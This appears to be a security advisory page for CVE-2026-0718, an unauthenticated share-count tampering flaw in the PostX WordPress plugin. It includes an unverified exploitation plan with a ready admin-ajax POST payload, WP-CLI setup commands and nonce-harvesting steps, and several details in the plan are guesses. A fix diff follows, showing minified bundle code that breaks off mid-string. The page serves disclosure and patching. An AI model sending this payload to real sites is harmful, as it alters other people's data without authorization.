CVE-2026-0718

Post Grid Gutenberg Blocks for News, Magazines, Blog Websites – PostX <= 5.0.5 - Missing Authorization to Limited Post Meta Modification

mediumMissing Authorization
5.3
CVSS Score
5.3
CVSS Score
medium
Severity
5.0.6
Patched in
0d
Time to patch

Description

The Post Grid Gutenberg Blocks for News, Magazines, Blog Websites – PostX plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ultp_shareCount_callback() function in all versions up to, and including, 5.0.5. This makes it possible for unauthenticated attackers to modify the share_count post meta for any post, including private or draft posts.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=5.0.5
PublishedApril 15, 2026
Last updatedApril 15, 2026
Affected pluginultimate-post

What Changed in the Fix

Changes introduced in v5.0.6

Loading patch diff...

Source Code

WordPress.org SVN
Research Plan
Unverified

# Exploitation Research Plan - CVE-2026-0718 ## 1. Vulnerability Summary The **Post Grid Gutenberg Blocks for News, Magazines, Blog Websites – PostX** plugin (versions <= 5.0.5) contains a missing authorization vulnerability in its AJAX handling logic. Specifically, the function `ultp_shareCount_ca…

Show full research plan

Exploitation Research Plan - CVE-2026-0718

1. Vulnerability Summary

The Post Grid Gutenberg Blocks for News, Magazines, Blog Websites – PostX plugin (versions <= 5.0.5) contains a missing authorization vulnerability in its AJAX handling logic. Specifically, the function ultp_shareCount_callback() is registered as an AJAX action accessible to unauthenticated users (wp_ajax_nopriv_ultp_shareCount) but fails to implement any capability checks (current_user_can) or nonce verification (check_ajax_referer). This allows an attacker to programmatically update the share_count metadata for any post ID, including those in draft or private status.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • AJAX Action: ultp_shareCount (inferred from callback name ultp_shareCount_callback)
  • HTTP Method: POST
  • Authentication: None (Unauthenticated)
  • Vulnerable Parameters:
    • post_id: The ID of the target post (public, private, or draft).
    • share_count: The new value to set for the share_count post meta.
  • Preconditions: The plugin must be active. The attacker needs to know or guess a valid Post ID.

3. Code Flow

  1. Entry Point: An unauthenticated user sends a POST request to admin-ajax.php with action=ultp_shareCount.
  2. Hook Registration (Inferred):
    add_action('wp_ajax_ultp_shareCount', 'ultp_shareCount_callback');
    add_action('wp_ajax_nopriv_ultp_shareCount', 'ultp_shareCount_callback');
    
  3. Vulnerable Function (ultp_shareCount_callback):
    The function likely performs the following (logic typical of share count incrementers):
    • Retrieves post_id from $_POST.
    • Retrieves share_count (or increments existing) from $_POST.
    • Sink: Calls update_post_meta($post_id, 'share_count', $share_count) or update_post_meta($post_id, 'ultp_share_count', $share_count).
    • Returns a success response.
  4. Missing Checks: The function lacks if ( ! current_user_can( ... ) ) and check_ajax_referer( ... ).

4. Nonce Acquisition Strategy

The vulnerability description explicitly states "missing authorization" and applies to unauthenticated users. In WordPress security contexts, this usually means the check_ajax_referer call is either entirely missing or the result is ignored.

However, if a nonce is required:

  1. Identify Script Localization: PostX typically localizes its AJAX data into a global JS object.
  2. Setup: Create a page with a PostX Post Grid block:
    wp post create --post_type=page --post_status=publish --post_content='<!-- wp:ultimate-post/post-grid /-->' --post_title='Nonce Page'
  3. Extraction:
    • Use browser_navigate to visit the page.
    • Use browser_eval to check for common PostX objects:
      • window.ultp_ajax_obj?.nonce
      • window.postx_common_obj?.nonce
      • window.ultimate_post_ajax?.nonce

Note: If the exploit works without a security or nonce parameter, the check is completely absent.

5. Exploitation Strategy

  1. Step 1: Identify Target: Create a private post to demonstrate the ability to modify non-public data.
  2. Step 2: Baseline Check: Verify the current share_count meta for the target post via WP-CLI.
  3. Step 3: Exploit Request: Send an unauthenticated AJAX request to modify the count.
  4. Step 4: Verification: Check the meta value again via WP-CLI.

HTTP Request (Payload)

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded

action=ultp_shareCount&post_id=[TARGET_POST_ID]&share_count=1337

6. Test Data Setup

  1. Install Plugin: Ensure PostX version 5.0.5 is installed.
  2. Create Target Content:
    • Public Post: wp post create --post_type=post --post_title='Public Post' --post_status=publish (ID will be returned)
    • Private Post: wp post create --post_type=post --post_title='Secret Post' --post_status=private (ID will be returned)
  3. Initialize Meta (Optional):
    • wp post meta add [PRIVATE_ID] share_count 0

7. Expected Results

  • Response: The server should return a 200 OK response, often returning the updated count or 1/success.
  • Database State: The wp_postmeta table for the specified post_id and meta_key share_count should now reflect the value 1337.
  • Access Control Bypass: The modification should succeed even though the user is unauthenticated and the post is private.

8. Verification Steps

After sending the HTTP request, run the following WP-CLI command:

# Check the meta value for the private post
wp post meta get [TARGET_POST_ID] share_count

Alternatively, if the meta key is prefixed:

wp post meta list [TARGET_POST_ID] --keys=share_count,ultp_share_count,_ultp_share_count

9. Alternative Approaches

If share_count is not the exact parameter or meta key name:

  1. Grep Plugin Source:
    grep -rn "update_post_meta" /var/www/html/wp-content/plugins/ultimate-post/ | grep "share"
    
  2. Check JS for parameter names:
    Search for the AJAX trigger in the plugin's frontend JS:
    grep -rn "action.*ultp_shareCount" /var/www/html/wp-content/plugins/ultimate-post/
    
  3. Parameter variation: Try count instead of share_count if the meta key is static but the input parameter differs.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Post Grid Gutenberg Blocks for News, Magazines, Blog Websites – PostX plugin for WordPress is vulnerable to unauthorized modification of post metadata due to a missing capability check on the `ultp_shareCount_callback()` function. This allows unauthenticated attackers to modify the `share_count` meta for any post, including private or draft posts, by sending a crafted AJAX request.

Security Fix

diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/addons/builder/assets/js/conditions.js /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/addons/builder/assets/js/conditions.js
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/addons/builder/assets/js/conditions.js	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/addons/builder/assets/js/conditions.js	2026-02-02 04:04:06.000000000 +0000
@@ -1,2 +1,2 @@
 /*! For license information please see conditions.js.LICENSE.txt */
-(()=>{var e={1974:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(2141),r=n(192);function o(e){var t=(0,a.Z)(e);return function(e){return(0,r.Z)(t,e)}}},192:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a={"!":function(e){return!e},"*":function(e,t){return e*t},"/":function(e,t){return e/t},"%":function(e,t){return e%t},"+":function(e,t){return e+t},"-":function(e,t){return e-t},"<":function(e,t){return e<t},"<=":function(e,t){return e<=t},">":function(e,t){return e>t},">=":function(e,t){return e>=t},"==":function(e,t){return e===t},"!=":function(e,t){return e!==t},"&&":function(e,t){return e&&t},"||":function(e,t){return e||t},"?:":function(e,t,n){if(e)throw t;return n}};function r(e,t){var n,r,o,i,l,s,p=[];for(n=0;n<e.length;n++){if(l=e[n],i=a[l]){for(r=i.length,o=Array(r);r--;)o[r]=p.pop();try{s=i.apply(null,o)}catch(e){return e}}else s=t.hasOwnProperty(l)?t[l]:+l;p.push(s)}return p[0]}},7680:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(1974);function r(e){var t=(0,a.Z)(e);return function(e){return+t({n:e})}}},2141:(e,t,n)=>{"use strict";var a,r,o,i;function l(e){for(var t,n,l,s,p=[],c=[];t=e.match(i);){for(n=t[0],(l=e.substr(0,t.index).trim())&&p.push(l);s=c.pop();){if(o[n]){if(o[n][0]===s){n=o[n][1]||n;break}}else if(r.indexOf(s)>=0||a[s]<a[n]){c.push(s);break}p.push(s)}o[n]||c.push(n),e=e.substr(t.index+n.length)}return(e=e.trim())&&p.push(e),p.concat(c.reverse())}n.d(t,{Z:()=>l}),a={"(":9,"!":8,"*":7,"/":7,"%":7,"+":6,"-":6,"<":5,"<=":5,">":5,">=":5,"==":4,"!=":4,"&&":3,"||":2,"?":1,"?:":1},r=["(","?"],o={")":["("],":":["?","?:"]},i=/<=|>=|==|!=|&&|\|\||\?:|\(|!|\*|\/|%|\+|-|<|>|\?|\)|:/},8247:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(4103),r=n(1755);const o=function(e,t){return function(n,o,i,l=10){const s=e[t];if(!(0,r.Z)(n))return;if(!(0,a.Z)(o))return;if("function"!=typeof i)return void console.error("The hook callback must be a function.");if("number"!=typeof l)return void console.error("If specified, the hook priority must be a number.");const p={callback:i,priority:l,namespace:o};if(s[n]){const e=s[n].handlers;let t;for(t=e.length;t>0&&!(l>=e[t-1].priority);t--);t===e.length?e[t]=p:e.splice(t,0,p),s.__current.forEach((e=>{e.name===n&&e.currentIndex>=t&&e.currentIndex++}))}else s[n]={handlers:[p],runs:0};"hookAdded"!==n&&e.doAction("hookAdded",n,o,i,l)}}},9992:(e,t,n)=>{"use strict";n.d(t,{Z:()=>a});const a=function(e,t){return function(){var n;const a=e[t];return null!==(n=a.__current[a.__current.length-1]?.name)&&void 0!==n?n:null}}},3972:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(1755);const r=function(e,t){return function(n){const r=e[t];if((0,a.Z)(n))return r[n]&&r[n].runs?r[n].runs:0}}},1786:(e,t,n)=>{"use strict";n.d(t,{Z:()=>a});const a=function(e,t){return function(n){const a=e[t];return void 0===n?void 0!==a.__current[0]:!!a.__current[0]&&n===a.__current[0].name}}},8642:(e,t,n)=>{"use strict";n.d(t,{Z:()=>a});const a=function(e,t){return function(n,a){const r=e[t];return void 0!==a?n in r&&r[n].handlers.some((e=>e.namespace===a)):n in r}}},1019:(e,t,n)=>{"use strict";n.d(t,{Z:()=>d});var a=n(8247),r=n(9099),o=n(8642),i=n(6424),l=n(9992),s=n(1786),p=n(3972);class c{constructor(){this.actions=Object.create(null),this.actions.__current=[],this.filters=Object.create(null),this.filters.__current=[],this.addAction=(0,a.Z)(this,"actions"),this.addFilter=(0,a.Z)(this,"filters"),this.removeAction=(0,r.Z)(this,"actions"),this.removeFilter=(0,r.Z)(this,"filters"),this.hasAction=(0,o.Z)(this,"actions"),this.hasFilter=(0,o.Z)(this,"filters"),this.removeAllActions=(0,r.Z)(this,"actions",!0),this.removeAllFilters=(0,r.Z)(this,"filters",!0),this.doAction=(0,i.Z)(this,"actions"),this.applyFilters=(0,i.Z)(this,"filters",!0),this.currentAction=(0,l.Z)(this,"actions"),this.currentFilter=(0,l.Z)(this,"filters"),this.doingAction=(0,s.Z)(this,"actions"),this.doingFilter=(0,s.Z)(this,"filters"),this.didAction=(0,p.Z)(this,"actions"),this.didFilter=(0,p.Z)(this,"filters")}}const d=function(){return new c}},9099:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(4103),r=n(1755);const o=function(e,t,n=!1){return function(o,i){const l=e[t];if(!(0,r.Z)(o))return;if(!n&&!(0,a.Z)(i))return;if(!l[o])return 0;let s=0;if(n)s=l[o].handlers.length,l[o]={runs:l[o].runs,handlers:[]};else{const e=l[o].handlers;for(let t=e.length-1;t>=0;t--)e[t].namespace===i&&(e.splice(t,1),s++,l.__current.forEach((e=>{e.name===o&&e.currentIndex>=t&&e.currentIndex--})))}return"hookRemoved"!==o&&e.doAction("hookRemoved",o,i),s}}},6424:(e,t,n)=>{"use strict";n.d(t,{Z:()=>a});const a=function(e,t,n=!1){return function(a,...r){const o=e[t];o[a]||(o[a]={handlers:[],runs:0}),o[a].runs++;const i=o[a].handlers;if(!i||!i.length)return n?r[0]:void 0;const l={name:a,currentIndex:0};for(o.__current.push(l);l.currentIndex<i.length;){const e=i[l.currentIndex].callback.apply(null,r);n&&(r[0]=e),l.currentIndex++}return o.__current.pop(),n?r[0]:void 0}}},1957:(e,t,n)=>{"use strict";n.d(t,{JQ:()=>a});const a=(0,n(1019).Z)(),{addAction:r,addFilter:o,removeAction:i,removeFilter:l,hasAction:s,hasFilter:p,removeAllActions:c,removeAllFilters:d,doAction:u,applyFilters:m,currentAction:f,currentFilter:h,doingAction:g,doingFilter:v,didAction:_,didFilter:w,actions:b,filters:x}=a},1755:(e,t,n)=>{"use strict";n.d(t,{Z:()=>a});const a=function(e){return"string"!=typeof e||""===e?(console.error("The hook name must be a non-empty string."),!1):/^__/.test(e)?(console.error("The hook name cannot begin with `__`."),!1):!!/^[a-zA-Z][a-zA-Z0-9_.-]*$/.test(e)||(console.error("The hook name can only contain numbers, letters, dashes, periods and underscores."),!1)}},4103:(e,t,n)=>{"use strict";n.d(t,{Z:()=>a});const a=function(e){return"string"!=typeof e||""===e?(console.error("The namespace must be a non-empty string."),!1):!!/^[a-zA-Z][a-zA-Z0-9_.\-\/]*$/.test(e)||(console.error("The namespace can only contain numbers, letters, dashes, periods, underscores and slashes."),!1)}},6016:(e,t,n)=>{"use strict";n.d(t,{o:()=>i});var a=n(5022);const r={plural_forms:e=>1===e?0:1},o=/^i18n\.(n?gettext|has_translation)(_|$)/,i=(e,t,n)=>{const i=new a.Z({}),l=new Set,s=()=>{l.forEach((e=>e()))},p=(e,t="default")=>{i.data[t]={...i.data[t],...e},i.data[t][""]={...r,...i.data[t]?.[""]},delete i.pluralForms[t]},c=(e,t)=>{p(e,t),s()},d=(e="default",t,n,a,r)=>(i.data[e]||p(void 0,e),i.dcnpgettext(e,t,n,a,r)),u=(e="default")=>e,_x=(e,t,a)=>{let r=d(a,t,e);return n?(r=n.applyFilters("i18n.gettext_with_context",r,e,t,a),n.applyFilters("i18n.gettext_with_context_"+u(a),r,e,t,a)):r};if(e&&c(e,t),n){const e=e=>{o.test(e)&&s()};n.addAction("hookAdded","core/i18n",e),n.addAction("hookRemoved","core/i18n",e)}return{getLocaleData:(e="default")=>i.data[e],setLocaleData:c,addLocaleData:(e,t="default")=>{i.data[t]={...i.data[t],...e,"":{...r,...i.data[t]?.[""],...e?.[""]}},delete i.pluralForms[t],s()},resetLocaleData:(e,t)=>{i.data={},i.pluralForms={},c(e,t)},subscribe:e=>(l.add(e),()=>l.delete(e)),__:(e,t)=>{let a=d(t,void 0,e);return n?(a=n.applyFilters("i18n.gettext",a,e,t),n.applyFilters("i18n.gettext_"+u(t),a,e,t)):a},_x,_n:(e,t,a,r)=>{let o=d(r,void 0,e,t,a);return n?(o=n.applyFilters("i18n.ngettext",o,e,t,a,r),n.applyFilters("i18n.ngettext_"+u(r),o,e,t,a,r)):o},_nx:(e,t,a,r,o)=>{let i=d(o,r,e,t,a);return n?(i=n.applyFilters("i18n.ngettext_with_context",i,e,t,a,r,o),n.applyFilters("i18n.ngettext_with_context_"+u(o),i,e,t,a,r,o)):i},isRTL:()=>"rtl"===_x("ltr","text direction"),hasTranslation:(e,t,a)=>{const r=t?t+""+e:e;let o=!!i.data?.[null!=a?a:"default"]?.[r];return n&&(o=n.applyFilters("i18n.has_translation",o,e,t,a),o=n.applyFilters("i18n.has_translation_"+u(a),o,e,t,a)),o}}}},7836:(e,t,n)=>{"use strict";n.d(t,{__:()=>__});var a=n(6016),r=n(1957);const o=(0,a.o)(void 0,void 0,r.JQ);o.getLocaleData.bind(o),o.setLocaleData.bind(o),o.resetLocaleData.bind(o),o.subscribe.bind(o);const __=o.__.bind(o);o._x.bind(o),o._n.bind(o),o._nx.bind(o),o.isRTL.bind(o),o.hasTranslation.bind(o)},2304:(e,t,n)=>{"use strict";n.d(t,{__:()=>a.__}),n(5917),n(6016);var a=n(7836)},5917:(e,t,n)=>{"use strict";var a=n(6290);n(8975),(0,a.Z)(console.error)},4528:(e,t,n)=>{"use strict";n.d(t,{c:()=>r});var a=n(7294);const r={add_plus_shopping_cart_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M5.862 3.76A1.75 1.75 0 0 0 4.13 2.25H2a.75.75 0 0 0 0 1.5h2.129a.25.25 0 0 1 .247.216l1.762 12.773c.059.427.27.8.572 1.069a2.5 2.5 0 1 0 4.33.442h5.17a2.5 2.5 0 1 0 2.29-1.5H7.871a.25.25 0 0 1-.247-.216l-.183-1.32 12.36-1.068a1.75 1.75 0 0 0 1.573-1.433l1.152-6.403a1.75 1.75 0 0 0-1.722-2.06H5.93l-.068-.49ZM7.75 19.25a1 1 0 1 1 2 0 1 1 0 0 1-2 0Zm9.75 0a1 1 0 1 1 2 0 1 1 0 0 1-2 0Zm-4.505-7.75v-1.245H11.75a.75.75 0 0 1 0-1.5h1.245V7.5a.75.75 0 0 1 1.5 0v1.255h1.255a.75.75 0 0 1 0 1.5h-1.255V11.5a.75.75 0 0 1-1.5 0Z",clipRule:"evenodd"})),android_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M20 10.25a.75.75 0 0 1 .75.75v6a.75.75 0 0 1-1.5 0v-6a.75.75 0 0 1 .75-.75Zm-16 0a.75.75 0 0 1 .75.75v6a.75.75 0 0 1-1.5 0v-6a.75.75 0 0 1 .75-.75ZM8.05 1.4a.75.75 0 0 0-.15 1.05l1.153 1.537A6.249 6.249 0 0 0 5.75 9.5v.5h12.5v-.5a6.249 6.249 0 0 0-3.303-5.513L16.1 2.45a.75.75 0 1 0-1.2-.9l-1.41 1.879a6.266 6.266 0 0 0-2.98 0L9.1 1.55a.75.75 0 0 0-1.05-.15ZM9.74 8a.75.75 0 0 1 .75-.75h.01a.75.75 0 0 1 0 1.5h-.01A.75.75 0 0 1 9.74 8Zm3.75-.75a.75.75 0 0 0 0 1.5h.01a.75.75 0 0 0 0-1.5h-.01Z",clipRule:"evenodd"}),(0,a.createElement)("path",{d:"M5.75 11.5V17a2.75 2.75 0 0 0 2.75 2.75h.25V22a.75.75 0 0 0 1.5 0v-2.25h4V22a.75.75 0 0 0 1.5 0v-2.261A2.75 2.75 0 0 0 18.25 17v-5.5H5.75Z"})),angry_emoji_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM6.25 9.5A.75.75 0 0 1 7 8.75c.549 0 1.303.068 1.982.285.632.202 1.458.619 1.704 1.493.043.152.064.31.064.472 0 .527-.197 1.1-.77 1.322-.493.192-.974-.001-1.25-.237-.277-.238-.62-.793-.262-1.39.044-.074.096-.14.153-.2a2.804 2.804 0 0 0-.095-.031C8.04 10.309 7.45 10.25 7 10.25a.75.75 0 0 1-.75-.75Zm8.768-.465c.678-.217 1.433-.285 1.982-.285a.75.75 0 0 1 0 1.5c-.451 0-1.041.059-1.526.214-.033.01-.065.021-.095.032.057.059.109.125.153.2.359.596.015 1.151-.262 1.389-.276.236-.758.429-1.25.237-.573-.223-.77-.795-.77-1.322 0-.162.021-.32.064-.472.246-.874 1.072-1.291 1.704-1.493Zm-6.347 8.3C9.262 16.153 10.58 15.5 12 15.5c1.42 0 2.738.653 3.33 1.835a.75.75 0 1 0 1.34-.67C15.763 14.847 13.83 14 12 14s-3.762.847-4.67 2.665a.75.75 0 0 0 1.34.67Z",clipRule:"evenodd"})),apple_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M20.054 8.58c-.123.096-2.287 1.337-2.287 4.095 0 3.191 2.754 4.32 2.836 4.348-.012.069-.437 1.546-1.452 3.051-.904 1.325-1.849 2.647-3.286 2.647s-1.806-.85-3.465-.85c-1.617 0-2.192.878-3.506.878-1.315 0-2.232-1.226-3.286-2.73-1.222-1.768-2.209-4.514-2.209-7.12 0-2.07.655-3.658 1.636-4.735 1-1.097 2.337-1.662 3.664-1.662 1.397 0 2.562.933 3.439.933.834 0 2.136-.989 3.725-.989.602 0 2.767.056 4.19 2.133Zm-4.945-3.904a5.04 5.04 0 0 0 .84-1.467 4.462 4.462 0 0 0 .282-1.528c0-.152-.013-.307-.04-.432-1.07.04-2.342.725-3.109 1.63-.602.697-1.164 1.797-1.164 2.913 0 .168.027.336.04.39.068.013.178.028.287.028.96 0 2.167-.654 2.864-1.534Z"})),arrow_down_bottom_downward_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm1 6.25a1 1 0 1 0-2 0v6.586l-1.793-1.793a1 1 0 0 0-1.414 1.414l3.5 3.5a1 1 0 0 0 1.414 0l3.5-3.5a1 1 0 0 0-1.414-1.414L13 14.086V7.5Z",clipRule:"evenodd"})),arrow_down_bottom_downward_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11 3.5a1 1 0 1 1 2 0v14.586l6.793-6.793a1 1 0 1 1 1.414 1.414l-8.5 8.5a1 1 0 0 1-1.414 0l-8.5-8.5a1 1 0 0 1 1.338-1.482l.076.068L11 18.086V3.5Z"})),arrow_down_bottom_left_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M17.293 5.293a1 1 0 1 1 1.414 1.414L8.414 17H18a1 1 0 1 1 0 2H6a1 1 0 0 1-1-1V6a1 1 0 0 1 2 0v9.586L17.293 5.293Z"})),arrow_down_bottom_right_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M5.293 5.293a1 1 0 0 1 1.414 0L17 15.586V6a1 1 0 1 1 2 0v12a1 1 0 0 1-1 1H6a1 1 0 1 1 0-2h9.586L5.293 6.707a1 1 0 0 1 0-1.414Z"})),arrow_down_dropdown_maximize_chevron_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M18 8.25a.75.75 0 0 1 .53 1.28l-6 6a.75.75 0 0 1-1.06 0l-6-6A.75.75 0 0 1 6 8.25h12Z"})),arrow_left_backward_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm-.293 7.957a1 1 0 0 0-1.414-1.414l-3.5 3.5a1 1 0 0 0 0 1.414l3.5 3.5a1 1 0 0 0 1.414-1.414L9.914 13H16.5a1 1 0 1 0 0-2H9.914l1.793-1.793Z",clipRule:"evenodd"})),arrow_left_backward_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11.293 2.793a1 1 0 1 1 1.414 1.414L5.914 11H20.5a1 1 0 1 1 0 2H5.914l6.793 6.793.068.076a1 1 0 0 1-1.406 1.406l-.076-.068-8.5-8.5a1 1 0 0 1 0-1.414l8.5-8.5Z"})),arrow_left_previous_backward_chevron_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M14.47 5.47a.75.75 0 0 1 1.28.53v12a.75.75 0 0 1-1.28.53l-6-6a.75.75 0 0 1 0-1.06l6-6Z"})),arrow_move_down_left_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M6.293 7.293A1 1 0 0 1 8 8v4h10a3 3 0 0 0 3-3V6a1 1 0 1 1 2 0v3a5 5 0 0 1-5 5H8v4a1 1 0 0 1-1.707.707l-5-5a1 1 0 0 1 0-1.414l5-5Z"})),arrow_move_down_right_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M16.617 7.076a1 1 0 0 1 1.09.217l5 5a1 1 0 0 1 0 1.414l-5 5A1 1 0 0 1 16 18v-4H6a5 5 0 0 1-5-5V6a1 1 0 0 1 2 0v3a3 3 0 0 0 3 3h10V8a1 1 0 0 1 .617-.924Z"})),arrow_move_up_left_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M21 18v-3a3 3 0 0 0-3-3H8v4a1 1 0 0 1-1.707.707l-5-5a1 1 0 0 1 0-1.414l5-5A1 1 0 0 1 8 6v4h10a5 5 0 0 1 5 5v3a1 1 0 1 1-2 0Z"})),arrow_move_up_right_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M1 18v-3a5 5 0 0 1 5-5h10V6a1 1 0 0 1 1.707-.707l5 5a1 1 0 0 1 0 1.414l-5 5A1 1 0 0 1 16 16v-4H6a3 3 0 0 0-3 3v3a1 1 0 1 1-2 0Z"})),arrow_right_forward_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm1.707 6.543a1 1 0 1 0-1.414 1.414L14.086 11H7.5a1 1 0 1 0 0 2h6.586l-1.793 1.793a1 1 0 0 0 1.414 1.414l3.5-3.5a1 1 0 0 0 0-1.414l-3.5-3.5Z",clipRule:"evenodd"})),arrow_right_forward_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11.293 2.793a1 1 0 0 1 1.414 0l8.5 8.5a1 1 0 0 1 0 1.414l-8.5 8.5a1 1 0 1 1-1.414-1.414L18.086 13H3.5a1 1 0 1 1 0-2h14.586l-6.793-6.793-.068-.076a1 1 0 0 1 .068-1.338Z"})),arrow_right_next_forward_chevron_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M8.713 5.307a.75.75 0 0 1 .817.163l6 6a.75.75 0 0 1 0 1.06l-6 6A.75.75 0 0 1 8.25 18V6a.75.75 0 0 1 .463-.693Z"})),arrow_up_dropdown_minimize_chevron_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11.527 8.418a.75.75 0 0 1 1.004.052l6 6a.75.75 0 0 1-.53 1.28H6a.75.75 0 0 1-.531-1.28l6-6 .057-.052Z"})),arrow_up_top_left_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M5 18V6a1 1 0 0 1 1-1h12a1 1 0 1 1 0 2H8.414l10.293 10.293.068.076a1 1 0 0 1-1.406 1.406l-.076-.068L7 8.414V18a1 1 0 1 1-2 0Z"})),arrow_up_top_right_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M19 18a1 1 0 1 1-2 0V8.414L6.707 18.707a1 1 0 1 1-1.414-1.414L15.586 7H6a1 1 0 0 1 0-2h12a1 1 0 0 1 1 1v12Z"})),arrow_up_top_upward_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm4.207 9.043-3.5-3.5a1 1 0 0 0-1.414 0l-3.5 3.5a1 1 0 1 0 1.414 1.414L11 9.914V16.5a1 1 0 1 0 2 0V9.914l1.793 1.793a1 1 0 0 0 1.414-1.414Z",clipRule:"evenodd"})),arrow_up_top_upward_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11 20.5V5.914l-6.793 6.793a1 1 0 1 1-1.414-1.414l8.5-8.5.076-.068a1 1 0 0 1 1.338.068l8.5 8.5.068.076a1 1 0 0 1-1.406 1.406l-.076-.068L13 5.914V20.5a1 1 0 1 1-2 0Z"})),at_a_mail_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M12 7c1.126 0 2.164.372 3 1a1 1 0 1 1 2 0v7a1 1 0 0 0 1 1 3 3 0 0 0 3-3v-1a9 9 0 1 0-9 9c1.64 0 3.176-.438 4.499-1.203a1 1 0 0 1 1.002 1.73A10.955 10.955 0 0 1 12 23C5.925 23 1 18.075 1 12S5.925 1 12 1s11 4.925 11 11v1a5 5 0 0 1-5 5 3.002 3.002 0 0 